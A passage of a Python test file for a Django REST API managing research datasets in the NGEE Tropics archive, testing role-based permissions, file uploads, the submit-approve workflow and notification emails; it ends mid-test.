class DataSetClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
def test_set_publication_date_denied(self):
self.login_user("vibe")
#########################################################################
# User may NOT publication date to now
response = self.client.get("/api/v1/datasets/2/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'detail': 'Not found.'}, value)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
3)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.login_user("lukecage")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
1)
self.login_user("arrow")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
1)
self.login_user("admin")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
4)
def test_options(self):
self.login_user("auser")
response = self.client.options('/api/v1/datasets/')
self.assertContains(response, "actions")
self.assertContains(response, "upload")
self.assertContains(response, "submit")
self.assertContains(response, "approve")
self.assertContains(response, "unapprove")
self.assertContains(response, "unsubmit")
def test_client_unnamed(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post("{}upload/".format(dataset_url), {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get(dataset_url)
self.assertContains(response, '{}archive/'.format(dataset_url),
status_code=status.HTTP_200_OK)
response = self.client.get('{}archive/'.format(dataset_url))
self.assertContains(response, ''.encode('utf-8'))
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '7686')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=Archive_" in response['Content-Disposition'])
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/datasets/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/datasets/2/')
value = json.loads(response.content.decode('utf-8'))
self.maxDiff=None
self.assertEqual(value,
{'modified_date': '2016-10-28T23:01:20.066913Z', 'doi': '', 'start_date': '2016-10-28',
'status_comment': '', 'plots': ['http://testserver/api/v1/plots/1/'],
'created_date': '2016-10-28T19:15:35.013361Z',
'funding_organizations': 'A few funding organizations',
'authors': ['http://testserver/api/v1/people/2/'], 'cdiac_import': False,
'doe_funding_contract_numbers': '',
'description': 'Qui illud verear persequeris te. Vis probo nihil verear an, zril tamquam philosophia eos te, quo ne fugit movet contentiones. Quas mucius detraxit vis an, vero omnesque petentium sit ea. Id ius inimicus comprehensam.',
'submission_date': '2016-10-28', 'qaqc_method_description': '',
'variables': ['http://testserver/api/v1/variables/2/',
'http://testserver/api/v1/variables/3/',
'http://testserver/api/v1/variables/1/'], 'archive': None,
'cdiac_submission_contact': None, 'reference': '', 'additional_access_information': '',
'contact': 'http://testserver/api/v1/people/2/', 'acknowledgement': '',
'data_set_id': 'NGT0001', 'archive_filename': None,
'modified_by': 'auser', 'status': '1', 'ngee_tropics_resources': True, 'qaqc_status': None,
'end_date': None, 'additional_reference_information': '', 'name': 'Data Set 2',
'managed_by': 'auser', 'sites': ['http://testserver/api/v1/sites/1/'],
'originating_institution': "LBNL", 'version': '0.0',
'url': 'http://testserver/api/v1/datasets/2/', 'access_level': '0',
'publication_date': None,
}
)
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
# Was the notification email sent?
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject,"[ngt-archive-test] Dataset Draft (NGT0004)")
self.assertTrue(email.body.find("""The dataset NGT0004:FooBarBaz has been saved as a draft in the NGEE Tropics Archive.
The dataset can be viewed at http://testserver. Login with your account credentials,
select "Edit Drafts" and then click the "Edit" button for NGT0004:FooBarBaz.
""") > 0)
self.assertEqual(email.to,['myuser@foo.bar'])
self.assertEqual(email.reply_to, settings.ARCHIVE_API['EMAIL_NGEET_TEAM'])
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['access_level'], '0')
self.assertEqual(value['sites'], [])
self.assertEqual(value['managed_by'], 'auser')
self.assertEqual(value['end_date'], None)
self.assertEqual(value['doe_funding_contract_numbers'], None)
self.assertEqual(value['funding_organizations'], None)
self.assertEqual(value['description'], 'A FooBarBaz DataSet')
self.assertEqual(value['additional_access_information'], None)
self.assertEqual(value['name'], 'FooBarBaz')
self.assertEqual(value['modified_by'], 'auser')
self.assertEqual(value['ngee_tropics_resources'], None)
self.assertEqual(value['status'], str(DataSet.STATUS_DRAFT))
self.assertEqual(value['doi'], None)
self.assertEqual(value['plots'], [])
self.assertEqual(value['contact'], None)
self.assertEqual(value['reference'], None)
self.assertEqual(value['variables'], [])
self.assertEqual(value['additional_reference_information'], None)
self.assertEqual(value['start_date'], None)
self.assertEqual(value['acknowledgement'], None)
self.assertEqual(value['status_comment'], None)
self.assertEqual(value['submission_date'], None)
self.assertEqual(value['qaqc_status'], None)
self.assertEqual(value['authors'], ["http://testserver/api/v1/people/2/"])
self.assertEqual(value['url'], 'http://testserver/api/v1/datasets/5/')
self.assertEqual(value['qaqc_method_description'], None)
#########################################################################
# User may NOT publication date to now
response = self.client.get("/api/v1/datasets/5/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'detail': 'Only a dataset in SUBMITTED or APPROVED status may have a publication date set.'}, value)
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
# The submit action should fail
response = self.client.post('/api/v1/datasets/5/submit/')
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'missingRequiredFields': ['archive',
'sites',
'contact',
'variables',
'ngee_tropics_resources',
'funding_organizations',
'originating_institution']}, value)
def test_client_put(self):
self.login_user("auser")
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get('/api/v1/datasets/1/')
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['description'], "A FooBarBaz DataSet")
def test_user_workflow(self):
"""
Test dataset workflow for an NGT User
:return:
"""
self.login_user("auser")
#########################################################################
# A dataset in submitted mode may not be submitted
response = self.client.get("/api/v1/datasets/2/submit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in DRAFT status may be submitted'}, value)
#########################################################################
# NGT User may not APPROVE a dataset
response = self.client.get("/api/v1/datasets/1/approve/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
#########################################################################
# NGT User may not APPROVE a dataset
response = self.client.get("/api/v1/datasets/2/approve/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
#########################################################################
# NGT User may edit a dataset in DRAFT mode if they own it
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual({'missingRequiredFields': ['archive','authors', 'funding_organizations', 'originating_institution']},
value)
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT User may not SUBMIT a dataset in DRAFT mode if they owne it
#Make sure file is uploaded first
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
#########################################################################
# NGT User may not unsubmit a dataset
response = self.client.get("/api/v1/datasets/1/unsubmit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
def test_admin_approve_workflow(self):
"""
Test Admin dataset workflow
:return:
"""
self.login_user("admin")
#########################################################################
# NGT Administrator may edit any DRAFT status (this will fail due to missing fields)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'missingRequiredFields': ['archive','authors', 'funding_organizations', 'originating_institution']},
value)
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
#########################################################################
# Cannot submit a dataset that it already in SUBMITTED status
response = self.client.get("/api/v1/datasets/2/submit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in DRAFT status may be submitted'}, value)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/2/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
#########################################################################
# NGT Administrator may edit a dataset in SUBMITTED status
response = self.client.put('/api/v1/datasets/2/',
data='{"description":"A FooBarBaz DataSet",'
'"name": "Data Set 2", '
'"status_comment": "",'
'"doi": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"access_level": "0",'
'"additional_reference_information": "",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/4/","http://testserver/api/v1/people/3/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # check authors
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(value["description"], "A FooBarBaz DataSet")
self.assertEqual(value["name"], "Data Set 2")
self.assertEqual(value["status_comment"], "")
self.assertEqual(value["doi"], "")
self.assertEqual(value["originating_institution"], "Lawrence Berkeley National Lab")
self.assertEqual(value["start_date"], "2016-10-28")
self.assertEqual(value["end_date"], None)
self.assertEqual(value["qaqc_status"], None)
self.assertEqual(value["qaqc_method_description"], "")
self.assertEqual(value["ngee_tropics_resources"], True)
self.assertEqual(value["funding_organizations"], "The funding organizations for my dataset")
self.assertEqual(value["doe_funding_contract_numbers"], "")
self.assertEqual(value["acknowledgement"], "")
self.assertEqual(value["reference"], "")
self.assertEqual(value["access_level"], "0")
self.assertEqual(value["additional_reference_information"], "")
self.assertEqual(value["additional_access_information"], "")
self.assertEqual(value["contact"], "http://testserver/api/v1/people/4/")
self.assertEqual(value["authors"], ["http://testserver/api/v1/people/4/", "http://testserver/api/v1/people/3/"])
self.assertEqual(value["sites"], ["http://testserver/api/v1/sites/1/"])
self.assertEqual(value["plots"], ["http://testserver/api/v1/plots/1/"])
self.assertEqual(value["variables"],
["http://testserver/api/v1/variables/2/","http://testserver/api/v1/variables/1/"])
#########################################################################
# A dataset that is not in SUBMITTED status may not be approved
response = self.client.get("/api/v1/datasets/1/approve/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in SUBMITTED status may be approved'}, value)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
#########################################################################
# NGT Administrator may APPROVE a SUBMITTED dataset
response = self.client.get("/api/v1/datasets/2/approve/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been approved.', 'success': True}, value)
# Was the notification email sent?
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject, "[ngt-archive-test] Dataset Approved (NGT0001)")
self.assertTrue(email.body.find("""The dataset NGT0001:Data Set 2 created on 10/28/2016 has been approved for release.
The dataset can be viewed at http://testserver. Login with your account credentials,
select "View Approved Datasets" and then click the "Approve" button for NGT0001:Data Set 2.
""") > 0)
self.assertEqual(email.to, ['myuser@foo.bar'])
self.assertEqual(email.reply_to, settings.ARCHIVE_API['EMAIL_NGEET_TEAM'])
#########################################################################
# NGT Administrator may set publication date to now
response = self.client.get("/api/v1/datasets/2/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'Publication date has been set.', 'success': True}, value)
# Validate that a publication date was set
response = self.client.get("/api/v1/datasets/2/")
assert response.json()["publication_date"] is not None
#########################################################################
# NGT Administrator may set publication date to a specific date
response = self.client.get("/api/v1/datasets/2/publication_date/?date=1/2/2018")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'Publication date has been set.', 'success': True}, value)
# Validate that a publication date was set
response = self.client.get("/api/v1/datasets/2/")
pub_date = response.json()["publication_date"]
assert pub_date is not None
assert pub_date == "2018-01-02"
#########################################################################
# APPROVED status: Cannot be deleted by anyone
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get("/api/v1/datasets/2/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_APPROVED))
#########################################################################
# NGT Administrator can put a dataset back into DRAFT status for corrections by the Owning NGT user
response = self.client.get("/api/v1/datasets/2/unsubmit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in SUBMITTED status may be un-submitted'}, value)
# Make sure no additional notification was sent
self.assertEqual(len(mail.outbox), 1)
response = self.client.get("/api/v1/datasets/2/unapprove/") # In approved mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unapproved.', 'success': True}, value)
self.assertEqual(1, len(mail.outbox)) # no notification emails sent
#########################################################################
# NGT Administrator my unapproved a dataset (put back into submitted mode)
response = self.client.get("/api/v1/datasets/1/unapprove/") # In approved mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in APPROVED status may be unapproved'}, value)
response = self.client.get("/api/v1/datasets/2/") # Check the status
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_SUBMITTED))
self.assertEqual(1, len(mail.outbox)) # no notification emails sent
def test_admin_unsubmit(self):
"""
Test Admin unsubmit
:return:
"""
self.login_user("admin")
#########################################################################
# Adn admin may unsubmit a dataset in SUBIMITTED MODE
response = self.client.get("/api/v1/datasets/2/unsubmit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unsubmitted.', 'success': True}, value)
response = self.client.get("/api/v1/datasets/2/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_DRAFT)) # check that the status is in DRAFT
def test_user_delete_not_allowed(self):
"""
Test Admin delete
:return:
"""
self.login_user("auser")
#########################################################################
# NGT User may not delete a SUBMITTED dataset
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
# Confirm that it wasn't deleted
response = self.client.get("/api/v1/datasets/2/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT user may delete a DRAFT dataset
response = self.client.delete("/api/v1/datasets/1/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/1/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_admin_delete_not_allowed(self):
"""
Test Admin delete
:return:
"""
self.login_user("admin")
#########################################################################
# NGT User may delete a SUBMITTED dataset
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT User may delete a DRAFT dataset
response = self.client.delete("/api/v1/datasets/1/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/1/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_upload(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("admin")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, ''.encode('utf-8'))
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length" ], '7686')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=Archive_" in response['Content-Disposition'])
downloadlog = DataSetDownloadLog.objects.all()
self.assertEqual(len(downloadlog),1)
# Now try to upload a text file (no restr
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, 'File uploaded',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '17609')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=valid_upload_" in response['Content-Disposition'])
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT User may not SUBMIT a dataset in DRAFT mode if they owne it
outbox_len = len(mail.outbox)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
self.assertEqual(outbox_len + 1, len(mail.outbox)) # notification emails sent
email = mail.outbox[0]
self.assertEqual(email.subject, "[ngt-archive-test] Dataset Submitted (NGT0000)")
self.assertTrue(email.body.find("""The dataset NGT0000:Data Set 1 created on 10/28/2016 was submitted to the NGEE Tropics Archive.
You will not be able to view this dataset until it has been approved.
""") > 0)
self.assertEqual(email.to, ['myuser@foo.bar'])
response = self.client.get("/api/v1/datasets/1/")
self.assertContains(response, '"version":"1.0"')
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '17609')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=valid_upload_" in response['Content-Disposition'])
import os
shutil.rmtree(os.path.join(settings.ARCHIVE_API['DATASET_ARCHIVE_ROOT'], "0000"))
def test_upload_not_found(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("auser") # auser does not own Dataset 3
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/3/upload/', {'attachment': fp})
self.assertContains(response, '"detail":"Not found."',
status_code=status.HTTP_404_NOT_FOUND)
response = self.client.get('/api/v1/datasets/3/')
self.assertNotContains(response, 'http://testserver/api/v1/datasets/3/archive/',
status_code=status.HTTP_404_NOT_FOUND)
response = self.client.get('http://testserver/api/v1/datasets/3/archive/')
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_upload_permission_denied(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("auser") # auser does not own Dataset 3
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/2/upload/', {'attachment': fp})
self.assertContains(response, '"detail":"You do not have permission to perform this action."',
status_code=status.HTTP_403_FORBIDDEN)
response = self.client.get('/api/v1/datasets/2/')
self.assertNotContains(response, 'http://testserver/api/v1/datasets/2/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('http://testserver/api/v1/datasets/2/archive/')
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_upload_anyfile(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("admin")
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, 'File uploaded',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('http://testserver/api/v1/datasets/1/archive/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_issue_118(self):
"""Error when trying to submit a dataset with ngee_tropics_resources set to false #118"""
self.login_user("auser")
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": false,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
### Make sure file is uploaded before submittind
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
#########################################################################
# NGT User may not SUBMIT a dataset in DRAFT mode if they owne it
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
# Test unsubmit workflow
self.login_user("admin")
#########################################################################
# NGT User may not SUBMIT a dataset in DRAFT mode if they owne it
response = self.client.get("/api/v1/datasets/1/unsubmit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unsubmitted.', 'success': True}, value)
self.login_user("auser")
#########################################################################
# NGT User may not SUBMIT a dataset in DRAFT mode if they owne it
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
def test_issue_187(self):
"REST API: submit check that plot matches a site #187"
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_400_BAD_REQUEST,response.status_code)
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"plots": ["A site must be selected."]})
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/2/"],'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual(json.loads(response.content.decode('utf-8')),
{'plots': ['Select the site corresponding to plot CC-CCPD1:Central City '
'CCPD Plot 1']})
def test_issue_173(self):
"""DataSet.name should not be unique #173"""
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
response = self.client.post('/api/v1/datasets/',
